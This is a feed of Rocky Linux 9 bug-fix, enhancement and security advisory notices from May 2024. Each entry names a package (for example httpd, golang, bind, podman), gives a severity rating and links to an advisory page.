10.05.2024 17:34:26rockylinux[RLBA-2024:2271] conmon bug fix and enhancement update (none)An update is available for conmon.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2271
10.05.2024 17:34:27rockylinux[RLBA-2024:2267] passt bug fix and enhancement update (none)An update is available for passt.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2267
10.05.2024 17:34:27rockylinux[RLBA-2024:2281] virtio-win bug fix and enhancement update (none)An update is available for virtio-win.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2281
10.05.2024 17:34:27rockylinux[RLSA-2024:2278] httpd security update (moderate)An update is available for httpd.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2278
10.05.2024 17:34:27rockylinux[RLBA-2024:2284] pipewire bug fix and enhancement update (none)An update is available for pipewire.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2284
10.05.2024 17:34:27rockylinux[RLBA-2024:2283] rear bug fix update (none)An update is available for rear.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2283
10.05.2024 17:34:27rockylinux[RLBA-2024:2291] boom-boot bug fix and enhancement update (none)An update is available for boom-boot.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2291
10.05.2024 17:34:27rockylinux[RLBA-2024:2306] tomcat bug fix and enhancement update (none)An update is available for tomcat.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2306
10.05.2024 17:34:27rockylinux[RLBA-2024:2312] python3.12-lxml bug fix and enhancement update (none)An update is available for python3.12-lxml.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2312
10.05.2024 17:34:27rockylinux[RLSA-2024:2302] gstreamer1-plugins-base security update (moderate)An update is available for gstreamer1-plugins-base.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2302
10.05.2024 17:34:27rockylinux[RLBA-2024:2314] python3.12-cffi bug fix and enhancement update (none)An update is available for python3.12-cffi.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2314
10.05.2024 17:34:27rockylinux[RLBA-2024:2311] python3.12-mod_wsgi bug fix and enhancement update (none)An update is available for python3.12-mod_wsgi.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2311
10.05.2024 17:34:27rockylinux[RLBA-2024:2325] python3.12-pycparser bug fix and enhancement update (none)An update is available for python3.12-pycparser.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2325
10.05.2024 17:34:27rockylinux[RLBA-2024:2326] autoconf bug fix and enhancement update (none)An update is available for autoconf-latest.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2326
10.05.2024 17:34:28rockylinux[RLBA-2024:2329] mingw-qemu-ga-win bug fix and enhancement update (none)An update is available for mingw-qemu-ga-win.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2329
10.05.2024 17:34:28rockylinux[RLSA-2024:2337] python3.11-cryptography security update (moderate)An update is available for python3.11-cryptography.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2337
10.05.2024 17:34:28rockylinux[RLBA-2024:2335] wireguard-tools bug fix and enhancement update (none)An update is available for wireguard-tools.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2335
10.05.2024 17:34:28rockylinux[RLBA-2024:2338] virtiofsd bug fix and enhancement update (none)An update is available for virtiofsd.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2338
10.05.2024 17:34:28rockylinux[RLEA-2024:2351] rust-afterburn bug fix and enhancement update (none)An update is available for rust-afterburn.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLEA-2024:2351
10.05.2024 17:34:28rockylinux[RLBA-2024:2354] certmonger bug fix and enhancement update (none)An update is available for certmonger.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2354
10.05.2024 17:34:28rockylinux[RLBA-2024:2352] libfprint bug fix and enhancement update (none)An update is available for libfprint.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2352
10.05.2024 17:34:28rockylinux[RLBA-2024:2362] squid bug fix and enhancement update (none)An update is available for squid.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2362
10.05.2024 17:34:28rockylinux[RLBA-2024:2361] cyrus-imapd bug fix and enhancement update (none)An update is available for cyrus-imapd.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2361
10.05.2024 17:34:28rockylinux[RLBA-2024:2359] cockpit-session-recording bug fix and enhancement update (none)An update is available for cockpit-session-recording.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2359
10.05.2024 17:34:28rockylinux[RLBA-2024:2367] tftp bug fix and enhancement update (none)An update is available for tftp.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2367
10.05.2024 17:34:28rockylinux[RLSA-2024:2366] freeglut security update (moderate)An update is available for freeglut.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2366
10.05.2024 17:34:28rockylinux[RLBA-2024:2370] synce4l bug fix and enhancement update (none)An update is available for synce4l.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2370
10.05.2024 17:34:29rockylinux[RLBA-2024:2372] sgpio bug fix and enhancement update (none)An update is available for sgpio.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2372
10.05.2024 17:34:29rockylinux[RLBA-2024:2381] rust-bootupd bug fix and enhancement update (none)An update is available for rust-bootupd.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2381
10.05.2024 17:34:29rockylinux[RLBA-2024:2388] fuse-overlayfs bug fix and enhancement update (none)An update is available for fuse-overlayfs.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2388
10.05.2024 17:34:29rockylinux[RLBA-2024:2390] ibus-anthy update (none)An update is available for ibus-anthy.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2390
10.05.2024 17:34:29rockylinux[RLBA-2024:2547] sushi bug fix update (none)An update is available for sushi.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2547
10.05.2024 17:34:29rockylinux[RLBA-2024:2555] gcc-toolset-12-gcc bug fix update (none)An update is available for gcc-toolset-12-gcc.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2555
10.05.2024 17:34:29rockylinux[RLSA-2024:2548] podman security and bug fix update (moderate)An update is available for podman.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2548
10.05.2024 17:34:29rockylinux[RLSA-2024:2550] buildah bug fix update (moderate)An update is available for buildah.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2550
10.05.2024 17:34:29rockylinux[RLSA-2024:2549] skopeo security and bug fix update (moderate)An update is available for skopeo.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2549
10.05.2024 17:34:29rockylinux[RLBA-2024:2553] bootc bug fix update (none)An update is available for bootc.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2553
10.05.2024 17:34:29rockylinux[RLBA-2024:2557] containers-common bug fix and enhancement update (none)An update is available for containers-common.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2557
10.05.2024 17:34:30rockylinux[RLSA-2024:2559] python-jwcrypto security update (moderate)An update is available for python-jwcrypto.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2559
10.05.2024 17:34:30rockylinux[RLBA-2024:2563] nss bug fix update (none)An update is available for nss.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2563
10.05.2024 17:34:30rockylinux[RLBA-2024:2567] aardvark-dns bug fix and enhancement update (none)An update is available for aardvark-dns.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2567
10.05.2024 17:34:30rockylinux[RLSA-2024:2564] mod_http2 security update (moderate)An update is available for mod_http2.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2564
10.05.2024 17:34:30rockylinux[RLSA-2024:2562] golang security update (important)An update is available for golang.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2562
10.05.2024 17:34:30rockylinux[RLSA-2024:2565] libreswan security update (moderate)An update is available for libreswan.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2565
10.05.2024 17:34:30rockylinux[RLSA-2024:2566] pcp security, bug fix, and enhancement update (important)An update is available for pcp.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2566
10.05.2024 17:34:30rockylinux[RLSA-2024:2568] grafana security update (moderate)An update is available for grafana.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2568
10.05.2024 17:34:30rockylinux[RLSA-2024:2569] grafana-pcp security update (important)An update is available for grafana-pcp.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2569
10.05.2024 17:34:31rockylinux[RLSA-2024:2616] tigervnc security update (important)An update is available for tigervnc.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2616
10.05.2024 17:34:31rockylinux[RLSA-2024:2724] git-lfs security update (important)An update is available for git-lfs.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2724
10.05.2024 17:34:19rockylinux[RLBA-2023:6326] libstoragemgmt bug fix and enhancement update (none)An update is available for libstoragemgmt.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2023:6326
10.05.2024 17:34:19rockylinux[RLBA-2023:6381] libwebp bug fix and enhancement update (none)An update is available for libwebp.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2023:6381
10.05.2024 17:34:19rockylinux[RLEA-2023:6416] libblkio bug fix and enhancement update (none)An update is available for libblkio.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLEA-2023:6416
10.05.2024 17:34:19rockylinux[RLSA-2023:6518] flatpak security, bug fix, and enhancement update (moderate)An update is available for flatpak.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2023:6518
10.05.2024 17:34:19rockylinux[RLBA-2023:6537] librelp bug fix and enhancement update (none)An update is available for librelp.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2023:6537
10.05.2024 17:34:20rockylinux[RLSA-2024:0951] postgresql security update (important)An update is available for postgresql.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:0951
10.05.2024 17:34:20rockylinux[RLBA-2024:1736] .NET 7.0 bugfix update (none)An update is available for dotnet7.0.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:1736
10.05.2024 17:34:20rockylinux[RLSA-2023:6551] yajl security update (moderate)An update is available for yajl.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2023:6551
10.05.2024 17:34:20rockylinux[RLSA-2024:1691] varnish security update (important)An update is available for varnish.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:1691
10.05.2024 17:34:20rockylinux[RLSA-2024:1750] unbound security update (important)An update is available for unbound.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:1750
10.05.2024 17:34:20rockylinux[RLBA-2024:2152] poppler bug fix and enhancement update (none)An update is available for poppler.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2152
10.05.2024 17:34:20rockylinux[RLBA-2024:2166] xdp-tools bug fix and enhancement update (none)An update is available for xdp-tools.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2166
10.05.2024 17:34:20rockylinux[RLBA-2024:2200] virt-v2v bug fix and enhancement update (none)An update is available for virt-v2v.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2200
10.05.2024 17:34:20rockylinux[RLBA-2024:2196] ibus bug fix and enhancement update (none)An update is available for ibus-hangul, ibus.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2196
10.05.2024 17:34:20rockylinux[RLBA-2024:2235] ostree bug fix and enhancement update (none)An update is available for ostree.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2235
10.05.2024 17:34:21rockylinux[RLBA-2024:2256] criu bug fix and enhancement update (none)An update is available for criu.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2256
10.05.2024 17:34:21rockylinux[RLSA-2024:2264] edk2 security update (important)An update is available for edk2.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2264
10.05.2024 17:34:21rockylinux[RLBA-2024:2263] mesa bug fix and enhancement update (none)An update is available for mesa.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2263
10.05.2024 17:34:21rockylinux[RLBA-2024:2268] anaconda bug fix and enhancement update (none)An update is available for anaconda.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2268
10.05.2024 17:34:21rockylinux[RLEA-2024:2269] nbdkit enhancement and bugfix update (none)An update is available for nbdkit.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLEA-2024:2269
10.05.2024 17:34:21rockylinux[RLSA-2024:2287] gstreamer1-plugins-bad-free security update (moderate)An update is available for gstreamer1-plugins-bad-free.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2287
10.05.2024 17:34:21rockylinux[RLSA-2024:2295] libjpeg-turbo security update (moderate)An update is available for libjpeg-turbo.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2295
10.05.2024 17:34:21rockylinux[RLBA-2024:2305] graphviz bug fix and enhancement update (none)An update is available for graphviz.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2305
10.05.2024 17:34:21rockylinux[RLBA-2024:2327] PackageKit bug fix and enhancement update (none)An update is available for PackageKit.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2327
10.05.2024 17:34:22rockylinux[RLBA-2024:2371] dovecot bug fix and enhancement update (none)An update is available for dovecot.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2371
10.05.2024 17:34:22rockylinux[RLBA-2024:2383] freeipmi bug fix and enhancement update (none)An update is available for freeipmi.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2383
10.05.2024 17:34:22rockylinux[RLEA-2024:2546] 389-ds-base enhancement update (none)An update is available for 389-ds-base.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLEA-2024:2546
10.05.2024 17:34:22rockylinux[RLSA-2024:2551] bind security update (important)An update is available for bind-dyndb-ldap, bind.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2551
10.05.2024 17:34:22rockylinux[RLBA-2024:2554] .NET 8.0 bug fix update (none)An update is available for dotnet8.0.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2554
10.05.2024 17:34:22rockylinux[RLBA-2024:2552] .NET 6.0 bug fix update (none)An update is available for dotnet6.0.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2552
10.05.2024 17:34:22rockylinux[RLBA-2024:2556] nmstate bug fix update (none)An update is available for nmstate.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2556
10.05.2024 17:34:22rockylinux[RLBA-2024:2558] ipa bug fix update (none)An update is available for ipa.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2558
10.05.2024 17:34:23rockylinux[RLBA-2024:2561] gnome-shell, gnome-menus, and gnome-shell-extensions bug fix update (none)An update is available for gnome-menus, gnome-shell, gnome-shell-extensions.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2561
10.05.2024 17:34:23rockylinux[RLSA-2024:2560] libvirt security and bug fix update (moderate)An update is available for libvirt.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2560
10.05.2024 17:34:15rockylinux[RLBA-2023:6590] ethtool bug fix and enhancement update (none)An update is available for ethtool.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2023:6590
10.05.2024 17:34:15rockylinux[RLBA-2023:6611] lua bug fix and enhancement update (none)An update is available for lua.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2023:6611
10.05.2024 17:34:15rockylinux[RLBA-2023:6673] kbd bug fix and enhancement update (none)An update is available for kbd.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2023:6673
10.05.2024 17:34:15rockylinux[RLBA-2023:6684] dbus bug fix and enhancement update (none)An update is available for dbus.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2023:6684
10.05.2024 17:34:15rockylinux[RLBA-2023:6691] python-dateutil bug fix and enhancement update (none)An update is available for python-dateutil.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2023:6691
10.05.2024 17:34:15rockylinux[RLBA-2023:6700] findutils bug fix and enhancement update (none)An update is available for findutils.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2023:6700
10.05.2024 17:34:15rockylinux[RLEA-2023:7251] microcode_ctl bug fix and enhancement update (none)An update is available for microcode_ctl.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLEA-2023:7251
10.05.2024 17:34:15rockylinux[RLBA-2024:2397] cockpit bug fix and enhancement update (none)An update is available for cockpit.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2397
10.05.2024 17:34:15rockylinux[RLBA-2024:2402] selinux-policy bug fix and enhancement update (none)An update is available for selinux-policy.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2402
10.05.2024 17:34:16rockylinux[RLBA-2024:2403] gcc bug fix and enhancement update (none)An update is available for gcc.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2403
